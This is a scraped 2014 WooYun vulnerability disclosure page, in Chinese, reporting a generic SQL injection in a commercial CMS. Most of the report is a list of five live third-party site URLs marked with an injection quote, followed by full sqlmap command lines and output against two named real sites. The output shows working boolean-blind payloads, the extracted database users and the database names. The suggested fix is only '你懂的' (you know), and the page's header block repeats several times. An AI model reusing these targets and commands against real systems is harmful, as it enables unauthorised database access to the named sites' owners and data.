某商务CMS通用型Sql注入漏洞 | wooyun-2014-064953| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-064953

漏洞标题：某商务CMS通用型Sql注入漏洞

漏洞作者：泳少

提交时间：2014-06-16 11:42

修复时间：2014-06-21 11:42

公开时间：2014-06-21 11:42

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-06-16：细节已通知厂商并且等待厂商处理中
1970-01-01：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
1970-02-25：细节向核心白帽子及相关领域专家公开
1970-03-07：细节向普通白帽子公开
1970-03-17：细节向实习白帽子公开
2014-06-21：细节向公众公开

简要描述：

RT///感谢神的指引！

详细说明：

关键字：技术支持:蓝创网络

然后。。我百度随便找了几个网站

我收集了几个网站：

http://www.filteco.com/news_s.asp?id=11%27
http://www.dctennis.cn/news_c.php?id=210%27
http://www.laoxiangren.cn/news_c.php?id=48&cf=news%27
http://www.vazbrand.com/product_detail.asp?id=1222%27
http://www.fsfhad.com/news_c.php?id=326%27

就几个哈！

漏洞证明：

然后利用sqlmap跑了两个网站的裤子

D:\sqlmap>sqlmap.py -u "http://www.dctennis.cn/news_c.php?id=210" --dbs --curren
t-user --current-db
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 21:51:35
[21:51:36] [INFO] using 'D:\sqlmap\output\www.dctennis.cn\session' as session fi
le
[21:51:36] [INFO] testing connection to the target url
[21:51:36] [INFO] testing if the url is stable, wait a few seconds
[21:51:38] [WARNING] url is not stable, sqlmap will base the page comparison on
a sequence matcher. If no dynamic nor injectable parameters are detected, or in
case of junk results, refer to user's manual paragraph 'Page comparison' and pro
vide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[21:51:49] [INFO] testing if GET parameter 'id' is dynamic
[21:51:49] [INFO] confirming that GET parameter 'id' is dynamic
[21:51:50] [INFO] GET parameter 'id' is dynamic
[21:51:50] [WARNING] heuristic test shows that GET parameter 'id' might not be i
njectable
[21:51:50] [INFO] testing sql injection on GET parameter 'id'
[21:51:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:51:56] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
[21:51:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[21:51:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:51:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[21:51:57] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[21:51:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:51:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[21:51:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[21:52:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[21:52:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:52:05] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[21:52:06] [INFO] testing 'Oracle AND time-based blind'
[21:52:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[21:52:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:52:06] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 42 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=210' AND 7877=7877 AND 'XUCC'='XUCC
---
[21:52:09] [INFO] testing MySQL
[21:52:09] [INFO] confirming MySQL
[21:52:10] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL >= 5.0.2
[21:52:10] [INFO] fetching current user
[21:52:10] [INFO] retrieved: sqPdctdddds<%
current user:    'sqPdctdddds<%'
[21:53:10] [INFO] fetching current database
[21:53:10] [INFO] retrieved: sq_dctennis
current database:    'sq_dctennis'
[21:54:14] [WARNING] information_schema not available, back-end DBMS is MySQL <
5. database names will be fetched from 'mysql' database
[21:54:14] [INFO] fetching database names
[21:54:14] [INFO] fetching number of databases
[21:54:14] [INFO] retrieved:
[21:54:14] [ERROR] unable to retrieve the number of databases
[21:54:14] [INFO] falling back to current database
[21:54:14] [INFO] fetching current database
available databases [1]:
[*] sq_dctennis
[21:54:14] [INFO] Fetched data logged to text files under 'D:\sqlmap\output\www.
dctennis.cn'
[*] shutting down at: 21:54:14

D:\sqlmap>sqlmap.py -u "http://www.laoxiangren.cn/news_c.php?id=48&cf=news" --db
s --current-user --current-db
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 21:52:05
[21:52:06] [INFO] using 'D:\sqlmap\output\www.laoxiangren.cn\session' as session
 file
[21:52:06] [INFO] testing connection to the target url
[21:52:08] [INFO] testing if the url is stable, wait a few seconds
[21:52:10] [INFO] url is stable
[21:52:10] [INFO] testing if GET parameter 'id' is dynamic
[21:52:10] [INFO] confirming that GET parameter 'id' is dynamic
[21:52:10] [INFO] GET parameter 'id' is dynamic
[21:52:10] [WARNING] heuristic test shows that GET parameter 'id' might not be i
njectable
[21:52:10] [INFO] testing sql injection on GET parameter 'id'
[21:52:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:52:12] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
[21:52:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[21:52:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:52:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[21:52:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[21:52:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:52:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[21:52:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[21:52:13] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[21:52:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:52:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[21:52:18] [INFO] testing 'Oracle AND time-based blind'
[21:52:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[21:52:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:52:23] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 42 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=48' AND 6123=6123 AND 'dGyf'='dGyf&cf=news
---
[21:52:24] [INFO] testing MySQL
[21:52:24] [INFO] confirming MySQL
[21:52:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL >= 5.0.2
[21:52:26] [INFO] fetching current user
[21:52:26] [INFO] retrieved: sqPddtxd2(1(<%
current user:    'sqPddtxd2(1(<%'
[21:53:09] [INFO] fetching current database
[21:53:09] [INFO] retrieved: sq_jhtxh2010
current database:    'sq_jhtxh2010'
[21:53:40] [WARNING] information_schema not available, back-end DBMS is MySQL <
5. database names will be fetched from 'mysql' database
[21:53:40] [INFO] fetching database names
[21:53:40] [INFO] fetching number of databases
[21:53:40] [INFO] retrieved:
[21:53:40] [ERROR] unable to retrieve the number of databases
[21:53:40] [INFO] falling back to current database
[21:53:40] [INFO] fetching current database
available databases [1]:
[*] sq_jhtxh2010
[21:53:40] [INFO] Fetched data logged to text files under 'D:\sqlmap\output\www.
laoxiangren.cn'
[*] shutting down at: 21:53:40

修复方案：

你懂的

版权声明：转载请注明来源泳少@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-06-21 11:42

厂商回复：

漏洞评价：

2014-06-20 14:17 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了，跪着也要...)

@cncert国家互联网应急中心求确认

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-064953

漏洞标题：某商务CMS通用型Sql注入漏洞

相关厂商：蓝创网络

漏洞作者：泳少

提交时间：2014-06-16 11:42

修复时间：2014-06-21 11:42

公开时间：2014-06-21 11:42

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源泳少@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-064953

漏洞标题：某商务CMS通用型Sql注入漏洞

相关厂商：蓝创网络

漏洞作者： 泳少

提交时间：2014-06-16 11:42

修复时间：2014-06-21 11:42

公开时间：2014-06-21 11:42

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-064953"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 泳少@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：泳少

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源泳少@乌云